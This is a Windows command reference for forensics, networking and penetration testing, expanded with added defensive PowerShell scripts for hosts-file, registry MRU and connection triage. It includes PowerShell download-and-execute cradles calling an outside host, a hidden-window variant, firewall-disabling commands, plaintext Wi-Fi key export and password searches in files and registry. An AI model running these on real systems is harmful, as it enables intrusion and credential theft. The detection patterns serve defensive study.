Win-Fu

This article collects Windows commands and artifact locations that are useful in the following areas:

  • Forensics
  • Network
  • Malware Analysis
  • Penetration Test

 

Important WINDOWS Files

%SYSTEMROOT%
Typically C:\Windows (%WINDIR% points to the same directory)

%SYSTEMROOT%\System32\drivers\etc\hosts
Static hostname-to-IP mappings, consulted before DNS; a common target for malware that redirects or blocks domains

%SYSTEMROOT%\System32\drivers\etc\networks
Legacy network-name-to-network-number mappings (rarely used today)

%SYSTEMROOT%\system32\config\SAM
Local account database (usernames and NT password hashes). The file is locked while Windows is running, so it is read from a volume shadow copy or offline, and decrypting the hashes also needs the SYSTEM hive from the same directory

%SYSTEMROOT%\repair\SAM
Backup copy of SAM (Windows 2000/XP era)

%SYSTEMROOT%\system32\config\RegBack\SAM
Backup copy of SAM (Windows Vista and later; empty by default since Windows 10 1803, where the automatic registry backup was disabled)

%WINDIR%\system32\config\AppEvent.Evt
Application Log (legacy .Evt format on Windows XP/2003; on Vista and later the log is %WINDIR%\System32\winevt\Logs\Application.evtx)

%WINDIR%\system32\config\SecEvent.Evt
Security Log (legacy .Evt format; on Vista and later %WINDIR%\System32\winevt\Logs\Security.evtx)
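The following script is an added example, not part of the original article, that walks the locations listed above on a live system from an elevated PowerShell prompt: it parses the hosts file and flags entries that point a name anywhere other than a loopback or blackhole address (that rule is the editor's own heuristic), reports the live SAM/SYSTEM hives and both SAM backup locations with their sizes so an empty RegBack is obvious, and lists whichever event log files (legacy .Evt or current .evtx) exist on the build. Function names are the editor's; the paths are the ones above.

```powershell
# Added example (not part of the original article). Assumes Windows PowerShell 5.1
# or later, run elevated so the config directory and hive files can be listed.

function Get-HostsFileEntries {
    # Parse the hosts file, strip comments, and flag entries that map a name to
    # something other than loopback/blackhole (editor's heuristic for redirects).
    param([string]$Path = "$env:SystemRoot\System32\drivers\etc\hosts")
    Get-Content -Path $Path -ErrorAction Stop |
        ForEach-Object { ($_ -split '#', 2)[0].Trim() } |   # drop trailing comments
        Where-Object { $_ } |                                 # drop blank lines
        ForEach-Object {
            $fields = $_ -split '\s+'
            if ($fields.Count -lt 2) { return }               # address with no names
            $ip = $fields[0]
            foreach ($name in $fields[1..($fields.Count - 1)]) {
                [pscustomobject]@{
                    Address    = $ip
                    Hostname   = $name
                    Suspicious = ($ip -notin '127.0.0.1', '::1', '0.0.0.0')
                }
            }
        }
}

function Get-SamHiveCopies {
    # Live hives plus both backup locations; a 0-byte RegBack copy is normal on
    # Windows 10 1803+ where automatic registry backups are disabled.
    $root = $env:SystemRoot
    foreach ($p in "$root\System32\config\SAM",
                   "$root\System32\config\SYSTEM",
                   "$root\repair\SAM",
                   "$root\System32\config\RegBack\SAM") {
        $item = Get-Item -LiteralPath $p -ErrorAction SilentlyContinue
        [pscustomobject]@{
            Path      = $p
            Exists    = [bool]$item
            SizeBytes = if ($item) { $item.Length } else { 0 }
            Note      = if (-not $item) { 'not present on this build' }
                        elseif ($item.Length -eq 0) { 'present but empty (backup disabled)' }
                        else { '' }
        }
    }
}

function Get-EventLogLocations {
    # Legacy .Evt files (XP/2003) and current .evtx files (Vista+), whichever exist.
    $root = $env:SystemRoot
    @(
        "$root\System32\config\AppEvent.Evt"
        "$root\System32\config\SecEvent.Evt"
        "$root\System32\winevt\Logs\Application.evtx"
        "$root\System32\winevt\Logs\Security.evtx"
    ) | Where-Object { Test-Path -LiteralPath $_ } |
        Get-Item | Select-Object FullName, Length, LastWriteTime
}

# Usage: flagged hosts entries first, then hive copies and log files
Get-HostsFileEntries  | Where-Object Suspicious | Format-Table -AutoSize
Get-SamHiveCopies     | Format-Table -AutoSize
Get-EventLogLocations | Format-Table -AutoSize
```

Entries that point security-vendor or update domains at 127.0.0.1 or 0.0.0.0 are not flagged by the heuristic but are the other classic hosts-file abuse, so the unfiltered output is still worth a glance.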

 

Important REGISTRY Keys

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32\LastVisitedMRU

# Executables that used the common Open/Save dialog, with the last folder each one accessed (the key is named LastVisitedPidlMRU on Windows Vista and later)

HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\File MRU

# Recently opened documents in Word (14.0 is Office 2010; other releases use their own version number, e.g. 15.0 for Office 2013 and 16.0 for Office 2016 and later)

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\TypedURLs

# URLs typed manually into the Internet Explorer address bar

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs

# Recently opened files and folders of the current user; for another account read HKEY_USERS\<SID>\Software\...\RecentDocs or load that user's NTUSER.DAT
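The values under these keys are not plain strings: RecentDocs and LastVisitedPidlMRU store REG_BINARY blobs that begin with a null-terminated UTF-16LE name followed by shell-item data, and their order is kept in MRUListEx, an array of little-endian DWORD indices terminated by 0xFFFFFFFF. The script below is an added example, not part of the original article, that decodes all four keys for the current user in most-recent-first order. It assumes Windows 7 or later (the Pidl key names, with a fallback to the XP-era LastVisitedMRU) and defaults to Office 16.0 rather than the 14.0 used above; the function names are the editor's.

```powershell
# Added example (not part of the original article). Windows PowerShell 5.1+,
# current user's hive. Shell-item data after the name is not decoded here.

function ConvertFrom-Utf16Prefix {
    # Leading null-terminated UTF-16LE string of a REG_BINARY blob.
    param([byte[]]$Bytes)
    for ($i = 0; $i -lt $Bytes.Length - 1; $i += 2) {
        if ($Bytes[$i] -eq 0 -and $Bytes[$i + 1] -eq 0) {
            return [System.Text.Encoding]::Unicode.GetString($Bytes, 0, $i)
        }
    }
    return [System.Text.Encoding]::Unicode.GetString($Bytes)
}

function Get-MruListExOrder {
    # Indices in most-recent-first order; the list ends with 0xFFFFFFFF.
    param([byte[]]$Bytes)
    for ($i = 0; $i + 3 -lt $Bytes.Length; $i += 4) {
        $idx = [BitConverter]::ToUInt32($Bytes, $i)
        if ($idx -eq 0xFFFFFFFF) { break }
        $idx
    }
}

function Get-BinaryMruEntries {
    # Generic reader for RecentDocs / LastVisitedPidlMRU style keys.
    param([string]$KeyPath)
    $key = Get-Item -LiteralPath $KeyPath -ErrorAction SilentlyContinue
    if (-not $key) { return }
    $list = $key.GetValue('MRUListEx')
    if (-not ($list -is [byte[]])) { return }
    $rank = 0
    foreach ($idx in Get-MruListExOrder -Bytes $list) {
        $blob = $key.GetValue("$idx")
        if ($blob -is [byte[]]) {
            [pscustomobject]@{ Key = $key.PSChildName; Rank = $rank; Entry = ConvertFrom-Utf16Prefix -Bytes $blob }
            $rank++
        }
    }
}

function Get-RecentDocs {
    $base = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs'
    Get-BinaryMruEntries -KeyPath $base                      # merged list, all types
    Get-ChildItem -LiteralPath $base -ErrorAction SilentlyContinue |
        ForEach-Object { Get-BinaryMruEntries -KeyPath $_.PSPath }   # one subkey per extension
}

function Get-LastVisitedMru {
    $base = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\ComDlg32'
    foreach ($name in 'LastVisitedPidlMRU', 'LastVisitedMRU') { Get-BinaryMruEntries -KeyPath "$base\$name" }
}

function Get-TypedUrls {
    # Plain REG_SZ values url1..urlN; url1 is the most recent.
    $key = Get-Item -LiteralPath 'HKCU:\Software\Microsoft\Internet Explorer\TypedURLs' -ErrorAction SilentlyContinue
    if (-not $key) { return }
    $key.GetValueNames() | Where-Object { $_ -match '^url\d+$' } |
        Sort-Object { [int]($_ -replace '\D', '') } |
        ForEach-Object { [pscustomobject]@{ Name = $_; Url = $key.GetValue($_) } }
}

function Get-OfficeFileMru {
    # Items look like "[F00000000][T01D9...][O00000000]*C:\path\doc.docx"; keep the path.
    # Signed-in Office 2016+ installs keep per-account lists under "User MRU\<id>\File MRU".
    param([string]$Version = '16.0')   # assumption: Office 2016/365; the article used 14.0
    $paths = @("HKCU:\Software\Microsoft\Office\$Version\Word\File MRU")
    $paths += Get-ChildItem -Path "HKCU:\Software\Microsoft\Office\$Version\Word\User MRU" -ErrorAction SilentlyContinue |
              ForEach-Object { "$($_.PSPath)\File MRU" }
    foreach ($p in $paths) {
        $key = Get-Item -LiteralPath $p -ErrorAction SilentlyContinue
        if (-not $key) { continue }
        $key.GetValueNames() | Where-Object { $_ -like 'Item *' } | ForEach-Object {
            [pscustomobject]@{ Item = $_; Path = ([string]$key.GetValue($_) -split '\*', 2)[-1] }
        }
    }
}

Get-RecentDocs     | Format-Table -AutoSize
Get-LastVisitedMru | Format-Table -AutoSize
Get-TypedUrls      | Format-Table -AutoSize
Get-OfficeFileMru  | Format-Table -AutoSize
```

Rank 0 in each key is the entry MRUListEx names first, i.e. the most recently used one, which is the ordering the raw numbered value names do not give you.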

 

WINDOWS NETWORK COMMANDS

ipconfig /all

# Display the full IP configuration (adapters, MAC addresses, DHCP and DNS servers)

ipconfig /displaydns

# Display the DNS resolver cache: names this host has recently resolved

netstat -ano

# List all connections and listening ports with numeric addresses and the owning PID

netstat -anop tcp 1

# Same, TCP only, refreshed every second (Ctrl+C to stop)

netstat -an | findstr LISTENING

# Display only listening ports

route print

# Display the routing table

arp -a

# Show the ARP cache

tftp -i ip GET remotefile

# Download a file from a remote TFTP server in binary mode (the TFTP client is an optional feature on Vista and later and is not installed by default)

netsh wlan show profiles

# Display the wireless network profiles this machine has previously connected to

netsh firewall set opmode disable

# Disable the firewall (requires an elevated prompt; the "netsh firewall" context is deprecated since Vista, current systems use "netsh advfirewall set allprofiles state off")

netsh wlan export profile folder=. key=clear

# Export all saved wireless profiles as XML files into the current folder, with the pre-shared key in plaintext (key=clear may need an elevated prompt to succeed)
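The XML that netsh writes carries more than the key: the SSID, the authentication and encryption type, whether the profile auto-connects, and a "protected" flag that tells you whether key=clear actually produced plaintext. The script below is an added example, not part of the original article, that runs the export and summarises every profile; the sample XML is constructed for the example in the layout netsh produces, and the folder and function names are the editor's.

```powershell
# Added example (not part of the original article). Windows PowerShell 5.1+;
# run Export-WlanProfiles from an elevated prompt so key=clear works.

# Constructed sample in the layout of a netsh export (not a real capture).
$SampleProfileXml = @'
<?xml version="1.0"?>
<WLANProfile xmlns="http://www.microsoft.com/networking/WLAN/profile/v1">
  <name>CorpGuest</name>
  <SSIDConfig><SSID><name>CorpGuest</name></SSID></SSIDConfig>
  <connectionType>ESS</connectionType>
  <connectionMode>auto</connectionMode>
  <MSM>
    <security>
      <authEncryption>
        <authentication>WPA2PSK</authentication>
        <encryption>AES</encryption>
        <useOneX>false</useOneX>
      </authEncryption>
      <sharedKey>
        <keyType>passPhrase</keyType>
        <protected>false</protected>
        <keyMaterial>guest-wifi-2019</keyMaterial>
      </sharedKey>
    </security>
  </MSM>
</WLANProfile>
'@

function ConvertFrom-WlanProfileXml {
    # Summarise one exported profile. Property access on [xml] ignores the namespace.
    param([Parameter(Mandatory)][string]$Xml)
    $p   = ([xml]$Xml).WLANProfile
    $sec = $p.MSM.security
    [pscustomobject]@{
        Profile        = $p.name
        SSID           = $p.SSIDConfig.SSID.name
        Authentication = $sec.authEncryption.authentication
        Encryption     = $sec.authEncryption.encryption
        ConnectionMode = $p.connectionMode                 # 'auto' profiles reconnect unattended
        KeyMaterial    = if ($sec.sharedKey.protected -eq 'false') { $sec.sharedKey.keyMaterial }
                         elseif ($sec.sharedKey) { '<DPAPI-protected: export again elevated with key=clear>' }
                         else { '' }                        # open or 802.1X networks carry no PSK
    }
}

function Export-WlanProfiles {
    # netsh writes one "<interface>-<profile>.xml" per saved profile into the folder.
    param([string]$Folder = (Join-Path $env:TEMP 'wlan-export'))
    New-Item -ItemType Directory -Path $Folder -Force | Out-Null
    netsh.exe wlan export profile folder="$Folder" key=clear | Out-Null
    Get-ChildItem -Path $Folder -Filter '*.xml' |
        ForEach-Object { ConvertFrom-WlanProfileXml -Xml (Get-Content -Raw -LiteralPath $_.FullName) }
}

# Offline check against the constructed sample:
ConvertFrom-WlanProfileXml -Xml $SampleProfileXml | Format-List

# Live collection (elevated):
# Export-WlanProfiles | Format-Table Profile, Authentication, ConnectionMode, KeyMaterial -AutoSize
```

When key=clear is refused, the export still succeeds but sharedKey/protected is "true" and keyMaterial is a DPAPI blob, which the summary reports instead of silently showing hex as if it were the passphrase. Delete the export folder afterwards; it now holds every PSK the machine knows.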

 

WINDOWS SYSTEM COMMANDS

ver

# Get the Windows version

echo %USERNAME%

# Display the current username

net user %USERNAME% *

# Change the password of the current user (prompts for the new password; requires an elevated prompt)

findstr /si password *.txt *.xml *.ini *.xls

# Search for the word "password" in these file types, case-insensitively (/i) and recursing into subdirectories (/s)

wmic qfe get Caption,Description,HotFixID,InstalledOn

# Display installed updates (wmic is deprecated in current Windows releases; Get-HotFix in PowerShell is the replacement)

reg query HKLM /f password /t REG_SZ /s

# Search for the word "password" in string values under HKLM, recursively (repeat with HKCU for per-user settings)

tasklist /M /FI "PID eq 6976"

# Displays the DLLs loaded by the process with PID 6976

tasklist /FI "PID eq 5240"

# Show the process with PID 5240

netstat -ano | findstr "ESTABLISHED"

# Show established connections with the owning PID of each
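The netstat and tasklist commands above have to be cross-referenced by hand: netstat gives a PID, tasklist turns it into a process name, and a second tasklist call lists its DLLs. The script below is an added example, not part of the original article, that does the join in one pass with Get-NetTCPConnection and Get-Process, and adds a tasklist /M equivalent that flags modules loaded from outside the Windows directory. It assumes Windows 8/Server 2012 or later (for the NetTCPIP module) and an elevated 64-bit PowerShell so other users' processes and their modules are visible; function names are the editor's.

```powershell
# Added example (not part of the original article). Windows 8+/PowerShell 5.1+,
# run elevated; the "outside Windows directory" flag is a triage hint, not a verdict.

function Get-ConnectionOwners {
    # netstat -ano joined with process name, path and user for each endpoint.
    param([string[]]$State = @('Established', 'Listen'))
    $plist = Get-Process -IncludeUserName -ErrorAction SilentlyContinue   # needs elevation
    if (-not $plist) { $plist = Get-Process }                             # fall back without user names
    $procs = @{}
    foreach ($p in $plist) { $procs[[int]$p.Id] = $p }
    Get-NetTCPConnection -State $State -ErrorAction SilentlyContinue | ForEach-Object {
        $p = $procs[[int]$_.OwningProcess]          # cast: hashtable keys must match type
        [pscustomobject]@{
            Local   = "$($_.LocalAddress):$($_.LocalPort)"
            Remote  = if ($_.State -eq 'Listen') { '' } else { "$($_.RemoteAddress):$($_.RemotePort)" }
            State   = $_.State
            PID     = $_.OwningProcess
            Process = if ($p) { $p.ProcessName } else { '<exited>' }
            User    = if ($p) { $p.UserName } else { '' }
            Path    = if ($p) { $p.Path } else { '' }
            Created = $_.CreationTime
        }
    }
}

function Get-LoadedModules {
    # tasklist /M /FI "PID eq <pid>" equivalent, with a flag for DLLs that do not
    # live under %SystemRoot% (Program Files is expected there; %TEMP% or a user
    # profile is not, and is the cheap sign of DLL hijacking or injection).
    param([Parameter(Mandatory)][int]$ProcessId)
    $proc = Get-Process -Id $ProcessId -ErrorAction Stop
    $proc.Modules | ForEach-Object {
        [pscustomobject]@{
            PID        = $ProcessId
            Module     = $_.ModuleName
            Path       = $_.FileName
            OutsideWin = -not $_.FileName.StartsWith($env:SystemRoot, [StringComparison]::OrdinalIgnoreCase)
        }
    }
}

# netstat -ano | findstr ESTABLISHED, with owners attached
Get-ConnectionOwners -State Established |
    Sort-Object Process | Format-Table Local, Remote, PID, Process, User -AutoSize

# Modules of every process that owns a listening socket, non-Windows paths only
Get-ConnectionOwners -State Listen | Select-Object -ExpandProperty PID -Unique |
    ForEach-Object { Get-LoadedModules -ProcessId $_ } |
    Where-Object OutsideWin | Format-Table PID, Module, Path -AutoSize
```

A PID that shows up as <exited> means the socket outlived its process between the two snapshots; re-run, or pass -State Established alone to narrow the set.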

 

Gathering Information on Wireless Networks

netsh wlan show networks

# List the SSIDs currently in range with their network type, authentication and encryption

netsh wlan show networks mode=bssid

# Same, plus each access point's BSSID (MAC address), signal strength, radio type and channel

 

PowerShell

download file

windows + r : powershell (new-object System.Net.WebClient).DownloadFile('http://besimaltinok.com/filename','%TEMP%\newname')

# Typed into the Run dialog (Win+R), which expands %TEMP% before PowerShell starts. Inside a PowerShell session use $env:TEMP instead, since single-quoted strings are not expanded.

run the downloaded file

windows + r : powershell (new-object System.Net.WebClient).DownloadFile('http://besimaltinok.com/filename','%TEMP%\newname.exe');Start-Process "%TEMP%\newname.exe"

run the downloaded file (hidden)

powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://besimaltinok.com/oldname','%TEMP%\newname.exe'); Start-Process "%TEMP%\newname.exe"

# Only the console window is hidden; the full command line still appears in process-creation logging (Security event 4688 with command-line auditing, Sysmon event 1) and in PowerShell script block logging (event 4104).

running an application with administrator rights

powershell start-process cmd.exe -Verb runAs

# Launches cmd.exe elevated; triggers a UAC prompt unless the current session is already elevated or UAC is disabled
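The defensive counterpart to the cradles above: with script block logging enabled (Group Policy "Turn on PowerShell Script Block Logging", or EnableScriptBlockLogging=1 under HKLM\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging), every executed block is written to the Microsoft-Windows-PowerShell/Operational log as event ID 4104, where the script text is the third event-data property. The script below is an added example, not part of the original article, that matches those blocks against patterns for the WebClient download, the Invoke-WebRequest aliases, hidden windows and encoded commands. The patterns and the sample blocks are the editor's constructed test data; the URLs in them use the reserved example.invalid name.

```powershell
# Added example (not part of the original article). Windows PowerShell 5.0+;
# Get-CradleEvents needs read access to the Operational log (run elevated).

$CradlePatterns = @(
    'System\.Net\.WebClient.*\.Download(File|String|Data)\('   # WebClient cradle as in the article
    'Invoke-WebRequest|\biwr\b|\bcurl\b|\bwget\b'               # cmdlet and its Windows PowerShell aliases
    'Start-BitsTransfer'                                        # BITS-based download
    '-w(indowstyle)?\s+h(idden)?'                               # hidden console window
    '-e(nc(odedcommand)?)?\s+[A-Za-z0-9+/=]{20,}'               # -EncodedCommand with a base64 payload
)

function Test-DownloadCradle {
    # Return every pattern the block matches; nothing is returned for a clean block.
    param([Parameter(Mandatory)][string]$ScriptBlock)
    foreach ($rx in $CradlePatterns) {
        if ($ScriptBlock -match $rx) { $rx }
    }
}

function Get-CradleEvents {
    # Pull 4104 events from the local log and keep the ones that hit a pattern.
    param([datetime]$Since = (Get-Date).AddDays(-7), [int]$Max = 5000)
    Get-WinEvent -FilterHashtable @{
            LogName   = 'Microsoft-Windows-PowerShell/Operational'
            Id        = 4104
            StartTime = $Since
        } -MaxEvents $Max -ErrorAction SilentlyContinue |
        ForEach-Object {
            # 4104 event data: MessageNumber, MessageTotal, ScriptBlockText, ScriptBlockId, Path
            $text = [string]$_.Properties[2].Value
            $hits = @(Test-DownloadCradle -ScriptBlock $text)
            if ($hits.Count) {
                [pscustomobject]@{
                    Time    = $_.TimeCreated
                    Level   = $_.LevelDisplayName   # Warning = block Windows itself classed as suspicious
                    Matches = $hits -join ' | '
                    Snippet = $text.Substring(0, [Math]::Min(120, $text.Length))
                }
            }
        }
}

# Constructed sample blocks (not real log data): the article's two cradles and one benign block
$Samples = @(
    '(new-object System.Net.WebClient).DownloadFile(''http://example.invalid/f'',''C:\Users\Public\newname.exe''); Start-Process "C:\Users\Public\newname.exe"'
    'powershell -windowstyle hidden iwr http://example.invalid/x -OutFile x.exe'
    'Get-ChildItem C:\Temp | Sort-Object Length -Descending'
)
foreach ($s in $Samples) {
    [pscustomobject]@{ Hits = @(Test-DownloadCradle -ScriptBlock $s).Count; Block = $s }
}

# Live hunt over the last week (elevated):
# Get-CradleEvents | Format-Table Time, Level, Matches, Snippet -AutoSize
```

Long script blocks are split across several 4104 events (MessageNumber of MessageTotal) that share one ScriptBlockId, so a cradle straddling the split can be missed by per-event matching; group by Properties[3] and join the text before matching if that matters in your environment. The curl and wget aliases exist in Windows PowerShell 5.1 but not in PowerShell 7, so expect those two patterns to need tuning.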

 

Besim ALTINOK

Cyber Security Researcher
